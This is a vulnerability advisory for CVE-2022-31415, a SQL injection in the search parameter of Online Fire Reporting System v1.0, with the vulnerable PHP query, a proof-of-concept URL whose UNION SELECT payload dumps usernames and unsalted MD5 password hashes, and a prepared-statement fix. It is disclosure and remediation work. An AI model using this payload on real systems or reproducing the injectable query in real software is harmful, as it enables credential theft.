Headline
CVE-2022-31415: SQL Injection - Online Fire Reporting System - ResearchInTheBin
Online Fire Reporting System v1.0 was discovered to contain a SQL injection vulnerability via the GET parameter in /report/list.php.
May 21, 2022
Product
Online Fire Reporting System
Product Link
Link
Vulnerability
SQL Injection
Severity
Critical
Overview
SQL injection is an attack in which an attacker injects their own input into a SQL query so that it is executed as part of the statement. This can allow the attacker to dump arbitrary data from the database.
The vulnerability results from a non-parameterised query used to fetch search results on the report search page, in the /report/list.php file:
<?php
if(isset($_GET['search'])):
    $i = 1;
    // $_GET['search'] is interpolated directly into the SQL string three times;
    // nothing escapes or parameterises it, so the raw input becomes part of the statement.
    $qry = $conn->query("SELECT * from `request_list` where (fullname LIKE '%{$_GET['search']}%' or contact LIKE '%{$_GET['search']}%' or code LIKE '%{$_GET['search']}%') order by abs(unix_timestamp(date_created)) desc ");
    while($row = $qry->fetch_assoc()):
?>
Because the user-supplied GET parameter is neither sanitised nor parameterised, a user can inject their own query and terminate it with a semicolon and a SQL comment, so that the remainder of the original query is discarded and the user controls what data is returned.
This can be used to exfiltrate the usernames and passwords of all users on the platform. As the passwords are stored as unsalted MD5 hashes, they would be very easy to crack by brute force.
PoC URL:
http://localhost/?p=report/list&search=a%27)%20UNION%20SELECT%20null,%20null,username,password,%20null,%20null,%20null,%20null,%20null,%20null%20FROM%20users;%20--%20-
The application should use parameterised (prepared) queries, so that user input is passed to the database as data rather than being interpolated into the SQL statement text.
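The same search query rewritten with a mysqli prepared statement, as an added example of the fix (this is not the project's own code; it assumes `$conn` is the application's existing mysqli connection and that the mysqlnd driver is available for `get_result()`):

```php
<?php
// Added example, not code from Online Fire Reporting System: the query from
// /report/list.php with the user input bound as a parameter instead of being
// interpolated into the SQL string. $conn is assumed to be the app's mysqli link.
if (isset($_GET['search'])):
    // The LIKE wildcards belong to the data, not to the statement, so they are
    // added to the bound value rather than written into the SQL text.
    $term = '%' . $_GET['search'] . '%';

    $stmt = $conn->prepare(
        "SELECT * FROM `request_list` "
        . "WHERE (fullname LIKE ? OR contact LIKE ? OR code LIKE ?) "
        . "ORDER BY ABS(UNIX_TIMESTAMP(date_created)) DESC"
    );
    // Each placeholder is bound as a string ('s'). The driver sends the value
    // separately from the statement, so quotes, parentheses, semicolons and
    // comment sequences in the input cannot change the structure of the query.
    $stmt->bind_param('sss', $term, $term, $term);
    $stmt->execute();
    $qry = $stmt->get_result(); // mysqli_result, so fetch_assoc() works as before

    // Caveat: binding prevents injection, but '%' and '_' typed by the user are
    // still interpreted as LIKE wildcards; escape them too if exact matching matters.
    while ($row = $qry->fetch_assoc()):
?>
        <tr>
            <td><?= htmlspecialchars($row['code']) ?></td>
            <td><?= htmlspecialchars($row['fullname']) ?></td>
        </tr>
<?php
    endwhile;
    $stmt->close();
endif;
```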